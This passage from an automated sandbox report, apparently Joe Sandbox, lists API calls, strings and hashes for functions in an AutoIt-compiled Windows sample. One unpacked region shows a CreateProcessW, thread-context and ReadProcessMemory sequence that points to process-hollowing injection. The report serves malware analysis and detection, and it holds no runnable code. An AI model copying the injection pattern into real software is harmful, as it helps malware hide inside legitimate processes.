                                                  • Instruction ID: 8cb1ea0bcf9927bbab911f76b3e997b0b1b022d64ffd5048fa480bb12183c4c7
                                                  • Opcode Fuzzy Hash: 640a513b0a1dc75cf27b9d1dcd7263df352c7e5bc7e4f1208c2f85c57f315c64
                                                  • Instruction Fuzzy Hash: 1EA12B75E00209EFDB14CFA4C894BEEBBB5BF48316F208159E606BB280D7759A44DF94

                                                  Control-flow Graph

                                                  APIs
                                                  • CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00BC3A03
                                                  • CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00BC3A24
                                                  • ShowWindow.USER32(00000000,?,?), ref: 00BC3A38
                                                  • ShowWindow.USER32(00000000,?,?), ref: 00BC3A41
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1307531350.0000000000BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true
                                                  • Associated: 00000005.00000002.1307513741.0000000000BC0000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307580161.0000000000C4F000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307580161.0000000000C74000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307628375.0000000000C7E000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307655334.0000000000C87000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bc0000_new.jbxd
                                                  Similarity
                                                  • API ID: Window$CreateShow
                                                  • String ID: AutoIt v3$edit
                                                  • API String ID: 1584632944-3779509399
                                                  • Opcode ID: ff51f3862eb542791ecba0ea9a83c4188bb18872ec60251be2025153513e8439
                                                  • Instruction ID: de4e66624f790a0a6a82ce3cb8c050e68532b04bd68a3c834e95eb52e2a45658
                                                  • Opcode Fuzzy Hash: ff51f3862eb542791ecba0ea9a83c4188bb18872ec60251be2025153513e8439
                                                  • Instruction Fuzzy Hash: 5BF03A745402907EEA3157236C08F2F3E7DE7C7F50B01003EB900A2170CAA50801DBB4

                                                  Control-flow Graph

                                                  APIs
                                                    • Part of subcall function 00F5C250: Sleep.KERNELBASE(000001F4), ref: 00F5C261
                                                  • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 00F5C4D5
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1307795327.0000000000F59000.00000040.00000020.00020000.00000000.sdmp, Offset: 00F59000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_f59000_new.jbxd
                                                  Similarity
                                                  • API ID: CreateFileSleep
                                                  • String ID: F7HPED9HIFI2CQLSTYCEG5PTQKMA
                                                  • API String ID: 2694422964-3962159092
                                                  • Opcode ID: 699dbaeb7620f88dd32467395bf0ecb549d3de4345e35a353a8846fa059b9930
                                                  • Instruction ID: cebc7a0c267c23e864d1b3fe683ae436594880a46106187491fb227daf51cd16
                                                  • Opcode Fuzzy Hash: 699dbaeb7620f88dd32467395bf0ecb549d3de4345e35a353a8846fa059b9930
                                                  • Instruction Fuzzy Hash: 28719270D04388DAEF11DBE4C8447EEBB75AF19304F044199E649BB2C1D7BA1B48DBA6

                                                  Control-flow Graph

                                                  APIs
                                                    • Part of subcall function 00BC4EE5: _fseek.LIBCMT ref: 00BC4EFD
                                                    • Part of subcall function 00C29734: _wcscmp.LIBCMT ref: 00C29824
                                                    • Part of subcall function 00C29734: _wcscmp.LIBCMT ref: 00C29837
                                                  • _free.LIBCMT ref: 00C296A2
                                                  • _free.LIBCMT ref: 00C296A9
                                                  • _free.LIBCMT ref: 00C29714
                                                    • Part of subcall function 00BE2D55: RtlFreeHeap.NTDLL(00000000,00000000,?,00BE9A24), ref: 00BE2D69
                                                    • Part of subcall function 00BE2D55: GetLastError.KERNEL32(00000000,?,00BE9A24), ref: 00BE2D7B
                                                  • _free.LIBCMT ref: 00C2971C
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1307531350.0000000000BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true
                                                  • Associated: 00000005.00000002.1307513741.0000000000BC0000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307580161.0000000000C4F000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307580161.0000000000C74000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307628375.0000000000C7E000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307655334.0000000000C87000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bc0000_new.jbxd
                                                  Similarity
                                                  • API ID: _free$_wcscmp$ErrorFreeHeapLast_fseek
                                                  • String ID: (l
                                                  • API String ID: 1552873950-844116408
                                                  • Opcode ID: 83a1bf45cb5b46f0fbbb2b282febcfcf75e63ad05b5baa694a85d9b23f0f737c
                                                  • Instruction ID: 1dbc0f9dad572c16c1e8fcf8e638d7cd6464014bb0f8c74132723d8f70b4a445
                                                  • Opcode Fuzzy Hash: 83a1bf45cb5b46f0fbbb2b282febcfcf75e63ad05b5baa694a85d9b23f0f737c
                                                  • Instruction Fuzzy Hash: 54515FB1D04268AFDF249F65DC81A9EBBB9EF48300F1044EEF609A3241DB715A90CF58

                                                  Control-flow Graph

                                                  APIs
                                                  • LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 00BFD3D7
                                                    • Part of subcall function 00BC7BCC: _memmove.LIBCMT ref: 00BC7C06
                                                  • _memset.LIBCMT ref: 00BC40FC
                                                  • _wcscpy.LIBCMT ref: 00BC4150
                                                  • Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00BC4160
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1307531350.0000000000BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true
                                                  • Associated: 00000005.00000002.1307513741.0000000000BC0000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307580161.0000000000C4F000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307580161.0000000000C74000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307628375.0000000000C7E000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307655334.0000000000C87000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bc0000_new.jbxd
                                                  Similarity
                                                  • API ID: IconLoadNotifyShell_String_memmove_memset_wcscpy
                                                  • String ID: Line:
                                                  • API String ID: 3942752672-1585850449
                                                  • Opcode ID: ac42abd6d244efb1ad2818f865b8b2d7ca2112ec77842beeed2b9509c0cdac45
                                                  • Instruction ID: 9438e63dfc69af317b6ac560b0dc96c0235a1e986de4ed7992c879bb29ad95f0
                                                  • Opcode Fuzzy Hash: ac42abd6d244efb1ad2818f865b8b2d7ca2112ec77842beeed2b9509c0cdac45
                                                  • Instruction Fuzzy Hash: C8319C71048705AFD321EB60DC56FEF77E8AF54314F1049AEF685920A1EFB0A648CB96
                                                  APIs
                                                    • Part of subcall function 00BC4DDD: LoadLibraryExW.KERNEL32(?,00000000,00000002,?,(l,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00BC4E0F
                                                  • _free.LIBCMT ref: 00BFE263
                                                  • _free.LIBCMT ref: 00BFE2AA
                                                    • Part of subcall function 00BC6A8C: SetCurrentDirectoryW.KERNEL32(?,?,?,?,00000000), ref: 00BC6BAD
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1307531350.0000000000BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true
                                                  • Associated: 00000005.00000002.1307513741.0000000000BC0000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307580161.0000000000C4F000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307580161.0000000000C74000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307628375.0000000000C7E000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307655334.0000000000C87000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bc0000_new.jbxd
                                                  Similarity
                                                  • API ID: _free$CurrentDirectoryLibraryLoad
                                                  • String ID: >>>AUTOIT SCRIPT<<<$Bad directive syntax error
                                                  • API String ID: 2861923089-1757145024
                                                  • Opcode ID: 994422adc057bf1138a08c8e5e743342c2abf5e6d1d3e08a8c7e95dc4ca95da0
                                                  • Instruction ID: c0c423e2c3653de136e398d642a6edf488c18a1b6419f62f8b46f73f927b427d
                                                  • Opcode Fuzzy Hash: 994422adc057bf1138a08c8e5e743342c2abf5e6d1d3e08a8c7e95dc4ca95da0
                                                  • Instruction Fuzzy Hash: D0914C71910219AFCF14EFA4CC919FDB7F4FF19310B1044AAF926AB2A1DB70AA55CB50
                                                  APIs
                                                    • Part of subcall function 00BE0162: MapVirtualKeyW.USER32(0000005B,00000000), ref: 00BE0193
                                                    • Part of subcall function 00BE0162: MapVirtualKeyW.USER32(00000010,00000000), ref: 00BE019B
                                                    • Part of subcall function 00BE0162: MapVirtualKeyW.USER32(000000A0,00000000), ref: 00BE01A6
                                                    • Part of subcall function 00BE0162: MapVirtualKeyW.USER32(000000A1,00000000), ref: 00BE01B1
                                                    • Part of subcall function 00BE0162: MapVirtualKeyW.USER32(00000011,00000000), ref: 00BE01B9
                                                    • Part of subcall function 00BE0162: MapVirtualKeyW.USER32(00000012,00000000), ref: 00BE01C1
                                                    • Part of subcall function 00BD60F9: RegisterWindowMessageW.USER32(WM_GETCONTROLNAME,?,00BCF930), ref: 00BD6154
                                                  • GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 00BCF9CD
                                                  • OleInitialize.OLE32(00000000), ref: 00BCFA4A
                                                  • CloseHandle.KERNEL32(00000000), ref: 00C045C8
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1307531350.0000000000BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true
                                                  • Associated: 00000005.00000002.1307513741.0000000000BC0000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307580161.0000000000C4F000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307580161.0000000000C74000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307628375.0000000000C7E000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307655334.0000000000C87000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bc0000_new.jbxd
                                                  Similarity
                                                  • API ID: Virtual$Handle$CloseInitializeMessageRegisterWindow
                                                  • String ID: H
                                                  • API String ID: 1986988660-69643886
                                                  • Opcode ID: 5d3ed4fe73425dbe0aa6ea847a910837659beec96cfadbe35426387c1aa5ffd7
                                                  • Instruction ID: 067d2deeed9c063ec7b5f799eb71e0e9ac2727d3cce191742354c6a1d518c501
                                                  • Opcode Fuzzy Hash: 5d3ed4fe73425dbe0aa6ea847a910837659beec96cfadbe35426387c1aa5ffd7
                                                  • Instruction Fuzzy Hash: BB81A9B4915A40CFC784EF39A844B1DBBE5FB99306790816EA419CB372EBF044858F1D
                                                  APIs
                                                  • RegOpenKeyExW.KERNELBASE(80000001,Control Panel\Mouse,00000000,00000001,00000000,00000003,00000000,80000001,80000001,?,00BC35A1,SwapMouseButtons,00000004,?), ref: 00BC35D4
                                                  • RegQueryValueExW.KERNELBASE(00000000,00000000,00000000,00000000,?,?,?,?,00BC35A1,SwapMouseButtons,00000004,?,?,?,?,00BC2754), ref: 00BC35F5
                                                  • RegCloseKey.KERNELBASE(00000000,?,?,00BC35A1,SwapMouseButtons,00000004,?,?,?,?,00BC2754), ref: 00BC3617
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1307531350.0000000000BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true
                                                  • Associated: 00000005.00000002.1307513741.0000000000BC0000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307580161.0000000000C4F000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307580161.0000000000C74000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307628375.0000000000C7E000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307655334.0000000000C87000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bc0000_new.jbxd
                                                  Similarity
                                                  • API ID: CloseOpenQueryValue
                                                  • String ID: Control Panel\Mouse
                                                  • API String ID: 3677997916-824357125
                                                  • Opcode ID: e54d285b9a568e58ed247ff88a5542c25f0cff9f0ceaf8503d541adc50ec0c30
                                                  • Instruction ID: 78e259413107d9fabd9c2cb0a2992bf1e539994754f19cce8ddc0a2bd9031dfe
                                                  • Opcode Fuzzy Hash: e54d285b9a568e58ed247ff88a5542c25f0cff9f0ceaf8503d541adc50ec0c30
                                                  • Instruction Fuzzy Hash: 60114575614208BFDB208F64DC80EAEBBF8EF45B41F4184A9E805D7210E2729E419BA0
                                                  APIs
                                                  • CreateProcessW.KERNELBASE(?,00000000), ref: 00F5BA0B
                                                  • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 00F5BAA1
                                                  • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 00F5BAC3
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1307795327.0000000000F59000.00000040.00000020.00020000.00000000.sdmp, Offset: 00F59000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_f59000_new.jbxd
                                                  Similarity
                                                  • API ID: Process$ContextCreateMemoryReadThreadWow64
                                                  • String ID:
                                                  • API String ID: 2438371351-0
                                                  • Opcode ID: 932a8f43b2c324a6e880b45aa11ae59a53f266e36399e6caa3e7e9a692624255
                                                  • Instruction ID: eabcfd1d551a90e6d210732f26c2540edcf5efc2c66376d5e6f134f1c4acef38
                                                  • Opcode Fuzzy Hash: 932a8f43b2c324a6e880b45aa11ae59a53f266e36399e6caa3e7e9a692624255
                                                  • Instruction Fuzzy Hash: 6D621B30A14258DBEB24CFA4C841BDEB372EF58301F1091A9D60DEB390E7799E85DB59
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1307531350.0000000000BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true
                                                  • Associated: 00000005.00000002.1307513741.0000000000BC0000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307580161.0000000000C4F000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307580161.0000000000C74000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307628375.0000000000C7E000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307655334.0000000000C87000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bc0000_new.jbxd
                                                  Similarity
                                                  • API ID: __flsbuf__flush__getptd_noexit__write_memmove
                                                  • String ID:
                                                  • API String ID: 2782032738-0
                                                  • Opcode ID: 998aeda2236a74d80706e5f9a46343bd1135ee917ddd04e378ba6ed458c3dace
                                                  • Instruction ID: 1f3342eda23e97fed1c951df09472f3ff84510a5c40684aa83bb3409c18a3cd6
                                                  • Opcode Fuzzy Hash: 998aeda2236a74d80706e5f9a46343bd1135ee917ddd04e378ba6ed458c3dace
                                                  • Instruction Fuzzy Hash: C1418575B007C59BDB188E6BD8809AE77E6EF46360F2485FDE815C7640E770DD418B90
                                                  APIs
                                                  • _memset.LIBCMT ref: 00BC44CF
                                                    • Part of subcall function 00BC407C: _memset.LIBCMT ref: 00BC40FC
                                                    • Part of subcall function 00BC407C: _wcscpy.LIBCMT ref: 00BC4150
                                                    • Part of subcall function 00BC407C: Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00BC4160
                                                  • KillTimer.USER32(?,00000001,?,?), ref: 00BC4524
                                                  • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00BC4533
                                                  • Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00BFD4B9
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1307531350.0000000000BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true
                                                  • Associated: 00000005.00000002.1307513741.0000000000BC0000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307580161.0000000000C4F000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307580161.0000000000C74000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307628375.0000000000C7E000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307655334.0000000000C87000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bc0000_new.jbxd
                                                  Similarity
                                                  • API ID: IconNotifyShell_Timer_memset$Kill_wcscpy
                                                  • String ID:
                                                  • API String ID: 1378193009-0
                                                  • Opcode ID: b4fe19299f829cf6fd9f3933aea79ae442569d281013356b9db19abb3a2f8ae2
                                                  • Instruction ID: abdc4ddeb51acb135364c35b9f4895ff1db257a65d4096e9cbbb663a0a7d2ee7
                                                  • Opcode Fuzzy Hash: b4fe19299f829cf6fd9f3933aea79ae442569d281013356b9db19abb3a2f8ae2
                                                  • Instruction Fuzzy Hash: 1821C5749047989FE7328B248895FFABBECEF16314F0404DDE79A57241C7746A88CB51
                                                  APIs
                                                  • _memset.LIBCMT ref: 00BFEA39
                                                  • GetOpenFileNameW.COMDLG32(?), ref: 00BFEA83
                                                    • Part of subcall function 00BC4750: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00BC4743,?,?,00BC37AE,?), ref: 00BC4770
                                                    • Part of subcall function 00BE0791: GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 00BE07B0
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1307531350.0000000000BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true
                                                  • Associated: 00000005.00000002.1307513741.0000000000BC0000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307580161.0000000000C4F000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307580161.0000000000C74000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307628375.0000000000C7E000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307655334.0000000000C87000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bc0000_new.jbxd
                                                  Similarity
                                                  • API ID: Name$Path$FileFullLongOpen_memset
                                                  • String ID: X
                                                  • API String ID: 3777226403-3081909835
                                                  • Opcode ID: 87bad9f2917f9262478bd0642734869fc7d5275c233d19e3c85b2982c2ad6686
                                                  • Instruction ID: a8214368aa7dbbce66f0f995d246b770a7806adbd9c69b7b8e607a26543ae167
                                                  • Opcode Fuzzy Hash: 87bad9f2917f9262478bd0642734869fc7d5275c233d19e3c85b2982c2ad6686
                                                  • Instruction Fuzzy Hash: 36219371A102589BCF519F98C845BEE7BF8AF49714F00809AE508BB241DFF4998DCFA1
                                                  APIs
                                                  • IsThemeActive.UXTHEME ref: 00BC4834
                                                    • Part of subcall function 00BE336C: __lock.LIBCMT ref: 00BE3372
                                                    • Part of subcall function 00BE336C: DecodePointer.KERNEL32(00000001,?,00BC4849,00C17C74), ref: 00BE337E
                                                    • Part of subcall function 00BE336C: EncodePointer.KERNEL32(?,?,00BC4849,00C17C74), ref: 00BE3389
                                                    • Part of subcall function 00BC48FD: SystemParametersInfoW.USER32(00002000,00000000,?,00000000), ref: 00BC4915
                                                    • Part of subcall function 00BC48FD: SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 00BC492A
                                                    • Part of subcall function 00BC3B3A: GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00BC3B68
                                                    • Part of subcall function 00BC3B3A: IsDebuggerPresent.KERNEL32 ref: 00BC3B7A
                                                    • Part of subcall function 00BC3B3A: GetFullPathNameW.KERNEL32(00007FFF,?,?,(l,00C852E0,?,?), ref: 00BC3BEB
                                                    • Part of subcall function 00BC3B3A: SetCurrentDirectoryW.KERNEL32(?), ref: 00BC3C6F
                                                  • SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 00BC4874
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1307531350.0000000000BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true
                                                  • Associated: 00000005.00000002.1307513741.0000000000BC0000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307580161.0000000000C4F000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307580161.0000000000C74000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307628375.0000000000C7E000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307655334.0000000000C87000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bc0000_new.jbxd
                                                  Similarity
                                                  • API ID: InfoParametersSystem$CurrentDirectoryPointer$ActiveDebuggerDecodeEncodeFullNamePathPresentTheme__lock
                                                  • String ID:
                                                  • API String ID: 1438897964-3162483948
                                                  • Opcode ID: cafebd3c0e02b34410a3e1ae331f9b38e5f63f9e26bd7764dfdf313a13cd55d3
                                                  • Instruction ID: b733e578995adcbe0c39d09e5890a5e71344d957d90f0a330d94689a0b2803d6
                                                  • Opcode Fuzzy Hash: cafebd3c0e02b34410a3e1ae331f9b38e5f63f9e26bd7764dfdf313a13cd55d3
                                                  • Instruction Fuzzy Hash: F0118C719083419FD700DF29D849B0EBFE8EB95750F10455EF090972B1DBB09645CB96
                                                  APIs
                                                  • GetTempPathW.KERNEL32(00000104,?), ref: 00C298F8
                                                  • GetTempFileNameW.KERNELBASE(?,aut,00000000,?), ref: 00C2990F
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1307531350.0000000000BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true
                                                  • Associated: 00000005.00000002.1307513741.0000000000BC0000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307580161.0000000000C4F000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307580161.0000000000C74000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307628375.0000000000C7E000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307655334.0000000000C87000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bc0000_new.jbxd
                                                  Similarity
                                                  • API ID: Temp$FileNamePath
                                                  • String ID: aut
                                                  • API String ID: 3285503233-3010740371
                                                  • Opcode ID: 530213cb4fb1bf5eef6e68240e9c79700a9ee24897ad5a8c24703d9a3a9d7bfd
                                                  • Instruction ID: 557300f4d3188edc083fbfe28f5f382b93d4913c73501f689c87171d935233c3
                                                  • Opcode Fuzzy Hash: 530213cb4fb1bf5eef6e68240e9c79700a9ee24897ad5a8c24703d9a3a9d7bfd
                                                  • Instruction Fuzzy Hash: F9D05E7958030DABDB609BA0DC0EF9A773CE704700F0042B1BB94910A1EAB095998B91
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1307531350.0000000000BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true
                                                  • Associated: 00000005.00000002.1307513741.0000000000BC0000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307580161.0000000000C4F000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307580161.0000000000C74000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307628375.0000000000C7E000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307655334.0000000000C87000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bc0000_new.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 799834a4d50fd3adcccac0374b61173d96cb4147c9952baa48bfbf9a07fdb954
                                                  • Instruction ID: ac4c43d237311919e6bcc0207e6e1ecb9cce2bf91c12bd1edc97f09eca3f3ba7
                                                  • Opcode Fuzzy Hash: 799834a4d50fd3adcccac0374b61173d96cb4147c9952baa48bfbf9a07fdb954
                                                  • Instruction Fuzzy Hash: DAF125716083019FCB14DF28C484A6EBBE5FF89314F14896EF8A99B251D770E945CF82
                                                  APIs
                                                  • _memset.LIBCMT ref: 00BC4370
                                                  • Shell_NotifyIconW.SHELL32(00000000,?), ref: 00BC4415
                                                  • Shell_NotifyIconW.SHELL32(00000001,?), ref: 00BC4432
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1307531350.0000000000BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true
                                                  • Associated: 00000005.00000002.1307513741.0000000000BC0000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307580161.0000000000C4F000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307580161.0000000000C74000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307628375.0000000000C7E000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307655334.0000000000C87000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bc0000_new.jbxd
                                                  Similarity
                                                  • API ID: IconNotifyShell_$_memset
                                                  • String ID:
                                                  • API String ID: 1505330794-0
                                                  • Opcode ID: 928a9779239fa167c44f9981e19be44af5399d31a6099b53b4c96507fe5823a1
                                                  • Instruction ID: 1525a87ad0fa51828f0cb5f97779bb2e6c1c5b15a0c95eaf49ced16f76d2aeb2
                                                  • Opcode Fuzzy Hash: 928a9779239fa167c44f9981e19be44af5399d31a6099b53b4c96507fe5823a1
                                                  • Instruction Fuzzy Hash: 4C3193705047118FD721DF24D894B9BBBF8FB89309F00097EF69AC2251DBB1AA44CB56
                                                  APIs
                                                  • __FF_MSGBANNER.LIBCMT ref: 00BE5733
                                                    • Part of subcall function 00BEA16B: __NMSG_WRITE.LIBCMT ref: 00BEA192
                                                    • Part of subcall function 00BEA16B: __NMSG_WRITE.LIBCMT ref: 00BEA19C
                                                  • __NMSG_WRITE.LIBCMT ref: 00BE573A
                                                    • Part of subcall function 00BEA1C8: GetModuleFileNameW.KERNEL32(00000000,00C833BA,00000104,?,00000001,00000000), ref: 00BEA25A
                                                    • Part of subcall function 00BEA1C8: ___crtMessageBoxW.LIBCMT ref: 00BEA308
                                                    • Part of subcall function 00BE309F: ___crtCorExitProcess.LIBCMT ref: 00BE30A5
                                                    • Part of subcall function 00BE309F: ExitProcess.KERNEL32 ref: 00BE30AE
                                                    • Part of subcall function 00BE8B28: __getptd_noexit.LIBCMT ref: 00BE8B28
                                                  • RtlAllocateHeap.NTDLL(00ED0000,00000000,00000001,00000000,?,?,?,00BE0DD3,?), ref: 00BE575F
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1307531350.0000000000BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true
                                                  • Associated: 00000005.00000002.1307513741.0000000000BC0000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307580161.0000000000C4F000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307580161.0000000000C74000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307628375.0000000000C7E000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307655334.0000000000C87000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bc0000_new.jbxd
                                                  Similarity
                                                  • API ID: ExitProcess___crt$AllocateFileHeapMessageModuleName__getptd_noexit
                                                  • String ID:
                                                  • API String ID: 1372826849-0
                                                  • Opcode ID: 3106f70ea36f3b277302e58ef458e15ee94f9b64ee7e3e4a7997330f443226d2
                                                  • Instruction ID: 91c4ba00c00a0337e4e12cbc7c1774b03c825fcb161e746ff6e7ae301e9580d7
